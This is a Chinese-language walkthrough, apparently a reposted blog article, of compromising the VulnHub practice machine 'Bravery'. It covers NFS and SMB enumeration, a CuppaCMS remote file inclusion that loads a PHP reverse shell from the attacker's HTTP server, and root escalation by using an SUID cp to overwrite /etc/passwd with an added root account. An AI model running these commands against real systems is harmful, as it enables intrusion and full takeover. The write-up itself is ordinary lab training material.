OSCP难度靶机之Bravery
2022-9-25 20:32:33 Author: 安全孺子牛(查看原文) 阅读量:8 收藏

虚拟机信息:虚拟机下载地址:https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/虚拟机简介:可能有不止一种方法来获得此计算机上的root特权目标:1个flag级别:初级

1、信息收集

1、通过netdiscover检测主机IP地址

netdiscover -r 192.168.207.0/24

2、通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.163

    通过扫描信息查看开放22、53、80、111、139、443、445、2049端口,并且检测到位WordPress4.8.3站点

2、WEB渗透测试

2.1 查看有nfs和smb服务,尝试nfs连接

showmount -e 192.168.207.163

2.2 挂载文件系统

mkdir /tmp/nsf
mount -t nfs 192.168.207.163:/var/nfsshare /tmp/nsf

2.3 查看目录中文件,类似密码

2.4 使用enum4linux查看smb服务

enum4linux 192.168.207.163

    查看有anonymous和secured目录

2.5 访问匿名文件夹

smbclient //192.168.207.163/anonymous
password: qwertyuioplkjhgfdsazxcvbnm

没有发现有用的信息

2.6 尝试使用david用户访问secured文件夹

smbclient //192.168.207.163/secured -U David
password: qwertyuioplkjhgfdsazxcvbnm
get david.txt
get genevieve.txt
get README.txt

下载共享文件

2.7 分别查看三个文件,得到网站访问目录

2.8 登录WEB查看

http://192.168.207.163/developmentsecretpage

http://192.168.207.163/genevieve/

使用burp进行探测发现,有一个cuppaCMS

2.8 使用searchsploit进行查找,有一个文件包含

searchsploit cuppa

2.9 查看POC

cat /usr/share/exploitdb/exploits/php/webapps/25971.txt

2.10 使用POC反弹shell

cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php
vim shell.php

2.11 开启http服务

python -m SimpleHTTPServer
nc -nlvp 4444
http://192.168.207.163/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.207.129:8000/shell.php?

2.12 获取反弹shell

2.13 使用python优化脚本

python -c 'import pty;pty.spawn("/bin/bash")'

3、系统提权

3.1 查找有suid的二进制文件

find / -perm -u=s -type f 2>/dev/null

发现cp有suid的权限

3.2 需要在kali机器上创建一个用户保存到/etc/passwd

密码为:hacker

perl -le 'print crypt("hacker","salt")'

使用perl生成加盐密码

创建账号为hacker

cp /etc/passwd ./
echo 'hacker:sagIxVoGwjNkY:0:0::/root:/bin/bash' >> passwd

3.3 在服务器上下载passwd文件

在kali上开启http服务

python -m SimpleHTTPServer

在服务器上下载passwd文件

cd /tmp
wget http://192.168.207.129:8000/passwd
cp passwd /etc/passwd

3.4 切换账号为hacker,查看flag

su - hacker
ls /root/


文章来源: http://mp.weixin.qq.com/s?__biz=MzI2MDI0NTM2Nw==&mid=2247488577&idx=1&sn=46e688425fd06843e4bbf8402dccf740&chksm=ea6dc659dd1a4f4f0c5c3e316e8aa80a7c4ebdb8bc0519820cd4286d71310860789c3d1da925#rd
如有侵权请联系:admin#unsafe.sh